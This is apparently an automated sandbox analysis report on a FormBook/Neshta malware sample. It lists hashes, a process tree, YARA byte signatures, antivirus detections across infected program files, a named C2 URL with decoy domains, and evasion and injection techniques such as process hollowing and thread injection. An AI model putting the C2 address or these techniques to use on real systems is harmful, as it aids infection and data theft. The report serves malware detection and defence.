Analysis Report vi0EwpbUht

Overview

General Information

Sample Name: vi0EwpbUht (renamed file extension from none to exe)
Analysis ID: 432848
MD5: f478c15f5affd8359762b8c6b0e913a4
SHA1: 05b36949abd35a132488158f38149c7b582c8d3a
SHA256: e355ac0da4996011e91f28b11e03c44d54606ae4ceb0bc4f6d0a0edc4b3410ed
Tags: exe, neshta

Detection

FormBook Neshta
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Yara detected Neshta
C2 URLs / IPs found in malware configuration
Creates an undocumented autostart registry key
Drops PE files with a suspicious file extension
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample is not signed and drops a device driver
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Uses netstat to query active network connections and open ports
AV process strings found (often used to terminate AV products)
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates driver files
Creates files inside the system directory
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Installs a raw input device (often for capturing keystrokes)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Process Tree

  • System is w10x64
  • vi0EwpbUht.exe (PID: 7096 cmdline: 'C:\Users\user\Desktop\vi0EwpbUht.exe' MD5: F478C15F5AFFD8359762B8C6B0E913A4)
    • vi0EwpbUht.exe (PID: 6184 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' MD5: 4A10F66447AAF017229FF618AAB923E3)
      • vi0EwpbUht.exe (PID: 6372 cmdline: 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' MD5: 4A10F66447AAF017229FF618AAB923E3)
        • explorer.exe (PID: 3440 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
          • svchost.com (PID: 3728 cmdline: 'C:\Windows\svchost.com' 'C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe' MD5: 713C9023AF9454658983BDEEC3B3F4D4)
            • elxhan.exe (PID: 1144 cmdline: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe MD5: 4A10F66447AAF017229FF618AAB923E3)
              • elxhan.exe (PID: 5572 cmdline: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exe MD5: 4A10F66447AAF017229FF618AAB923E3)
          • NETSTAT.EXE (PID: 5948 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)
            • cmd.exe (PID: 4140 cmdline: /c del 'C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
              • conhost.exe (PID: 4592 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • help.exe (PID: 5944 cmdline: C:\Windows\SysWOW64\help.exe MD5: 09A715036F14D3632AD03B52D1DA6BFF)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.personalizedyardsigns.com/xkcp/"], "decoy": ["plcnotary.com", "pennywisebusiness.net", "negatzone.com", "hangclinic.com", "choice-home-warranty-review.com", "oslojistas.com", "keguanchina.com", "amazoncarbonhub.com", "myworkaccident.com", "shipu299.com", "henselectrlc.com", "store55588.com", "11ncbee.net", "reissantorini.com", "karta.gold", "goldenstatesurplus.net", "soslifefood.com", "bis-adapter.net", "harrywalia.com", "myboutiqueflowers.com", "rareearthmetalrefining.com", "triathletestrength.com", "jumtix.xyz", "shropshirepaddleboarding.com", "promocaomercadolivre.com", "tetratechinstruction.com", "emergingleadership.coach", "aresponsibleperson.net", "gethesspp.com", "zicanotes.com", "lance2375problems.com", "sxkeyuanda.com", "hotradio1.com", "dcsingersforhire.com", "shophigh5.com", "heaustralia.site", "bandlaser.com", "pucksbar.net", "financialdy.com", "digech.com", "livablelandbuyer.com", "bccluster.com", "xn--o39ay81ahtag62aba.com", "petalumaroofing.com", "handmadebyclydelle.com", "thecanineharness.com", "83twistleton.com", "shardulwakade.net", "shopcovetandcrave.com", "babateeconsult.com", "plancougar.com", "buyketoeasy.com", "dccustomcreation.com", "nutellajam.com", "kaiocarvalho.com", "treschicbeautyloft.com", "gofornye.com", "agileintelligence.coach", "poetryartists.com", "teailn.com", "letsreflectonline.net", "uggoutletosterreich.com", "metododgl.com", "centurygreatpath.info"]}

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
vi0EwpbUht.exe | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34

Dropped Files

Source | Rule | Description | Author | Strings
C:\Program Files (x86)\Microsoft Office\Office16\CNFNOT32.EXE | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\ProgramData\Package Cache\{050d4fc8-5d48-4b8f-8972-47c82c46020f}\vcredist_x64.exe | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\Program Files (x86)\Microsoft Office\Office16\MSOUC.EXE | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
C:\Program Files (x86)\Microsoft Office\Office16\lync99.exe | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
  • 0xa0e7:$x1: the best. Fuck off all the rest.
  • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
  • 0xa108:$s1: Neshta
  • 0xa113:$s2: Made in Belarus.
  • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
  • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
  • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34

Memory Dumps

Source | Rule | Description | Author | Strings
00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
    00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18409:$sqlite3step: 68 34 1C 7B E1
    • 0x1851c:$sqlite3step: 68 34 1C 7B E1
    • 0x18438:$sqlite3text: 68 38 2A 90 C5
    • 0x1855d:$sqlite3text: 68 38 2A 90 C5
    • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
      00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

      Unpacked PEs

      Source | Rule | Description | Author | Strings
      7.2.elxhan.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
        7.2.elxhan.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x9b52:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x15675:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x15161:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x15777:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x158ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0xa56a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x143dc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xb263:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1b4e7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1c4ea:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        7.2.elxhan.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x18409:$sqlite3step: 68 34 1C 7B E1
        • 0x1851c:$sqlite3step: 68 34 1C 7B E1
        • 0x18438:$sqlite3text: 68 38 2A 90 C5
        • 0x1855d:$sqlite3text: 68 38 2A 90 C5
        • 0x1844b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x18573:$sqlite3blob: 68 53 D8 7F 8C
        1.2.vi0EwpbUht.exe.400000.0.unpack | MAL_Neshta_Generic | Detects Neshta malware | Florian Roth
        • 0xa0e7:$x1: the best. Fuck off all the rest.
        • 0xa1a8:$x2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
        • 0xa108:$s1: Neshta
        • 0xa113:$s2: Made in Belarus.
        • 0x5530:$op1: 85 C0 93 0F 85 62 FF FF FF 5E 5B 89 EC 5D C2 04
        • 0x329e:$op2: E8 E5 F1 FF FF 8B C3 E8 C6 FF FF FF 85 C0 75 0C
        • 0x1860:$op3: EB 02 33 DB 8B C3 5B C3 53 85 C0 74 15 FF 15 34
        1.2.vi0EwpbUht.exe.400000.0.unpack | JoeSecurity_Neshta | Yara detected Neshta | Joe Security

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          AV Detection:

          Antivirus / Scanner detection for submitted sample
          Source: vi0EwpbUht.exe, Avira: detected
          Antivirus detection for dropped file
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Avira: detection malicious, Label: W32/Neshta.A
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Avira: detection malicious, Label: W32/Neshta.A
          Found malware configuration
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, Malware Configuration Extractor: FormBook
          Multi AV Scanner detection for dropped file
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, ReversingLabs: Detection: 95%
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, ReversingLabs: Detection: 95%
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, ReversingLabs: Detection: 95%
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, ReversingLabs: Detection: 96%
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, ReversingLabs: Detection: 100%
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Metadefender: Detection: 91%
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, ReversingLabs: Detection: 100%
          Multi AV Scanner detection for submitted file
          Source: vi0EwpbUht.exe, Metadefender: Detection: 91%
          Source: vi0EwpbUht.exe, ReversingLabs: Detection: 100%
          Yara detected FormBook
          Source: Yara match, File source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match, File source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match, File source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPE
          Machine Learning detection for dropped file
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Au3Info.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\upx.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\32BitMAPIBroker.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\ADelRCP.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\wow_helper.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\pi_brokers\64BitMAPIBroker.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroTextExtractor.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\arh.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\FullTrustNotifier.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\reader_sl.exe, Joe Sandbox ML: detected
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\ose.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AdobeCollabSync.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Uninstall.exe, Joe Sandbox ML: detected
          Source: C:\MSOCache\All Users\{90160000-0011-0000-0000-0000000FF1CE}-C\setup.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\Au3Check.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\LogTransport2.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Eula.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroBroker.exe, Joe Sandbox ML: detected
          Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe, Joe Sandbox ML: detected
          Machine Learning detection for sample
          Source: vi0EwpbUht.exe, Joe Sandbox ML: detected
          Source: 1.2.vi0EwpbUht.exe.400000.0.unpack, Avira: Label: W32/Neshta.A
          Source: 7.1.elxhan.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.2.NETSTAT.EXE.292ed78.2.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 5.2.svchost.com.400000.0.unpack, Avira: Label: W32/Neshta.A
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 6.2.elxhan.exe.22b0000.3.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 7.2.elxhan.exe.400000.0.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 17.2.NETSTAT.EXE.328f834.5.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 2.2.vi0EwpbUht.exe.2ff0000.3.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: 5.0.svchost.com.400000.0.unpack, Avira: Label: W32/Neshta.A
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, Avira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.0.vi0EwpbUht.exe.400000.0.unpack, Avira: Label: W32/Neshta.A
          Source: 4.0.explorer.exe.1183f834.74.unpack, Avira: Label: TR/Patched.Ren.Gen
          Source: vi0EwpbUht.exe, Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
          Source: Binary string: netstat.pdbGCTL source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp
          Source: Binary string: netstat.pdb source: vi0EwpbUht.exe, 00000003.00000002.480933192.0000000002A20000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: vi0EwpbUht.exe, 00000002.00000003.327241678.0000000003140000.00000004.00000001.sdmp, vi0EwpbUht.exe, 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, elxhan.exe, 00000007.00000002.565127229.0000000000B0F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: vi0EwpbUht.exe, elxhan.exe, NETSTAT.EXE, help.exe
          Source: Binary string: wscui.pdb source: explorer.exe, 00000004.00000000.439100550.0000000007CA0000.00000002.00000001.sdmp

          Spreading:

          Yara detected Neshta
